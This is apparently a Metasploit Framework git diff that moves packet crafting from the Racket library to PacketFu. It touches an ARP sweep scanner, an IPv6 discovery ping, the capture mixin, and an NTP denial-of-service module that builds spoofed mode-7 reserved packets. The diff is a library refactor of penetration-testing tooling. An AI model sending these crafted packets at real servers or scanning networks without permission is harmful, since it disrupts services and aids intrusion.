diff --git a/lib/msf/core/exploit/capture.rb b/lib/msf/core/exploit/capture.rb index ddd2a88e87..696130d57b 100644 --- a/lib/msf/core/exploit/capture.rb +++ b/lib/msf/core/exploit/capture.rb @@ -166,7 +166,7 @@ module Exploit::Capture if not pcap raise RuntimeError, "Could not access the capture process (remember to open_pcap first!)" else - pcap.inject(pkt) + pcap.inject(pkt.to_s) # Can be a PacketFu Packet object or a pre-packed string end end diff --git a/modules/auxiliary/dos/ntp/ntpd_reserved_dos.rb b/modules/auxiliary/dos/ntp/ntpd_reserved_dos.rb index 233bf5e5cc..54041ff079 100644 --- a/modules/auxiliary/dos/ntp/ntpd_reserved_dos.rb +++ b/modules/auxiliary/dos/ntp/ntpd_reserved_dos.rb @@ -10,8 +10,6 @@ ## require 'msf/core' -require 'racket' - class Metasploit3 < Msf::Auxiliary @@ -57,25 +55,16 @@ class Metasploit3 < Msf::Auxiliary open_pcap - n = Racket::Racket.new + p = PacketFu::UDPPacket.new + p.ip_saddr = datastore['LHOST'] + p.ip_daddr = ip + p.ip_ttl = 255 + p.udp_src = 123 + p.udp_dst = 123 + p.payload = ["\x17", "\x97\x00\x00\x00"][rand(2)] + p.recalc + capture_sendto(p,ip) - n.l3 = Racket::L3::IPv4.new - n.l3.src_ip = datastore['LHOST'] - n.l3.dst_ip = ip - n.l3.protocol = 17 - n.l3.id = rand(0xffff)+1 - n.l3.ttl = 255 - - n.l4 = Racket::L4::UDP.new - n.l4.src_port = 123 - n.l4.dst_port = 123 - n.l4.payload = ["\x17","\x97\x00\x00\x00"][rand(2)] - - n.l4.fix!(n.l3.src_ip, n.l3.dst_ip) - - buff = n.pack - - capture_sendto(buff, ip) close_pcap end diff --git a/modules/auxiliary/scanner/discovery/arp_sweep.rb b/modules/auxiliary/scanner/discovery/arp_sweep.rb index ca27b75460..63abb677f4 100644 --- a/modules/auxiliary/scanner/discovery/arp_sweep.rb +++ b/modules/auxiliary/scanner/discovery/arp_sweep.rb @@ -67,24 +67,23 @@ class Metasploit3 < Msf::Auxiliary hosts.each do |dhost| if dhost != shost probe = buildprobe(shost, smac, dhost) - capture.inject(probe) + inject(probe) while(reply = getreply()) - next if not reply[:arp] - print_status("#{reply[:arp].spa} appears to be up.") - - report_host(:host => reply[:arp].spa, :mac=>reply[:arp].sha) + next unless reply.is_arp? + print_status("#{reply.arp_saddr_ip} appears to be up.") + report_host(:host => reply.arp_saddr_ip, :mac=>reply.arp_saddr_mac) end + end end etime = Time.now.to_f + datastore['TIMEOUT'] while (Time.now.to_f < etime) while(reply = getreply()) - next if not reply[:arp] - print_status("#{reply[:arp].spa} appears to be up.") - - report_host(:host => reply[:arp].spa, :mac=>reply[:arp].sha) + next unless reply.is_arp? + print_status("#{reply.arp_saddr_ip} appears to be up.") + report_host(:host => reply.arp_saddr_ip, :mac=>reply.arp_saddr_mac) end Kernel.select(nil, nil, nil, 0.50) end @@ -95,31 +94,26 @@ class Metasploit3 < Msf::Auxiliary end def buildprobe(shost, smac, dhost) - n = Racket::Racket.new - n.l2 = Racket::L2::Ethernet.new(Racket::Misc.randstring(14)) - n.l2.src_mac = smac - n.l2.dst_mac = 'ff:ff:ff:ff:ff:ff' - n.l2.ethertype = 0x0806 - - n.l3 = Racket::L3::ARP.new - n.l3.opcode = Racket::L3::ARP::ARPOP_REQUEST - n.l3.sha = n.l2.src_mac - n.l3.tha = n.l2.dst_mac - n.l3.spa = shost - n.l3.tpa = dhost - n.pack + p = PacketFu::ARPPacket.new + p.eth_saddr = smac + p.eth_daddr = "ff:ff:ff:ff:ff:ff" + p.arp_opcode = 1 + p.arp_saddr_mac = p.eth_saddr + p.arp_daddr_mac = p.eth_daddr + p.arp_saddr_ip = shost + p.arp_daddr_ip = dhost + p.recalc + p end def getreply - pkt = capture.next - return if not pkt - - eth = Racket::L2::Ethernet.new(pkt) - return if not eth.ethertype == 0x0806 - - arp = Racket::L3::ARP.new(eth.payload) - return if not arp.opcode == Racket::L3::ARP::ARPOP_REPLY - - {:raw => pkt, :eth => eth, :arp => arp} + pkt_bytes = capture.next + Kernel.select(nil,nil,nil,0.1) + return unless pkt_bytes + pkt = PacketFu::Packet.parse(pkt_bytes) + return unless pkt.is_arp? + return unless pkt.arp_opcode == 2 + pkt end + end diff --git a/modules/auxiliary/scanner/discovery/ipv6_multicast_ping.rb b/modules/auxiliary/scanner/discovery/ipv6_multicast_ping.rb index be28f1d0fb..63bc1b1968 100644 --- a/modules/auxiliary/scanner/discovery/ipv6_multicast_ping.rb +++ b/modules/auxiliary/scanner/discovery/ipv6_multicast_ping.rb @@ -36,34 +36,30 @@ class Metasploit3 < Msf::Auxiliary max_epoch = ::Time.now.to_i + timeout while(::Time.now.to_i < max_epoch) - pkt = capture.next() + pkt_bytes = capture.next() Kernel.select(nil,nil,nil,0.1) - next if not pkt - eth = Racket::L2::Ethernet.new(pkt) - - next if not eth.ethertype.eql?(Racket::L2::Ethernet::ETHERTYPE_IPV6) - ipv6 = Racket::L3::IPv6.new(eth.payload) - - next if not ipv6.nhead == 0x3a - icmpv6 = Racket::L4::ICMPv6.new(ipv6.payload) - - next if not icmpv6.type == Racket::L4::ICMPv6Generic::ICMPv6_TYPE_ECHO_REPLY - - icmpv6 = Racket::L4::ICMPv6EchoReply.new(ipv6.payload) - host_addr = Racket::L3::Misc.long2ipv6(ipv6.src_ip) - host_mac = eth.src_mac - - if(!hosts[host_addr].eql?(host_mac)) + next if not pkt_bytes + p = PacketFu::Packet.parse(pkt_bytes) + # Don't bother checking if it's an echo reply, since Neighbor Solicitations + # and any other response is just as good. + next unless p.is_ipv6? + host_addr = p.ipv6_saddr + host_mac = p.eth_saddr + next if host_mac == smac + unless hosts[host_addr] == host_mac hosts[host_addr] = host_mac print_status(" |*| #{host_addr} => #{host_mac}") - # report_host(:mac => host_mac, :host => host_addr) end end - return(hosts) + return hosts + end + + def smac + datastore['SMAC'].to_s.empty? ? ipv6_mac : datastore['SMAC'] end def run - # Start caputre + # Start capture open_pcap({'FILTER' => "icmp6"}) # Send ping diff --git a/modules/exploits/multi/misc/wireshark_lwres_getaddrbyname.rb b/modules/exploits/multi/misc/wireshark_lwres_getaddrbyname.rb index f189faa3b1..afc1800a58 100644 --- a/modules/exploits/multi/misc/wireshark_lwres_getaddrbyname.rb +++ b/modules/exploits/multi/misc/wireshark_lwres_getaddrbyname.rb @@ -11,7 +11,6 @@ require 'msf/core' -require 'racket' class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking diff --git a/modules/exploits/multi/misc/wireshark_lwres_getaddrbyname_loop.rb b/modules/exploits/multi/misc/wireshark_lwres_getaddrbyname_loop.rb index 74a6e92f04..7980f38e83 100644 --- a/modules/exploits/multi/misc/wireshark_lwres_getaddrbyname_loop.rb +++ b/modules/exploits/multi/misc/wireshark_lwres_getaddrbyname_loop.rb @@ -10,7 +10,6 @@ ## require 'msf/core' -require 'racket' class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking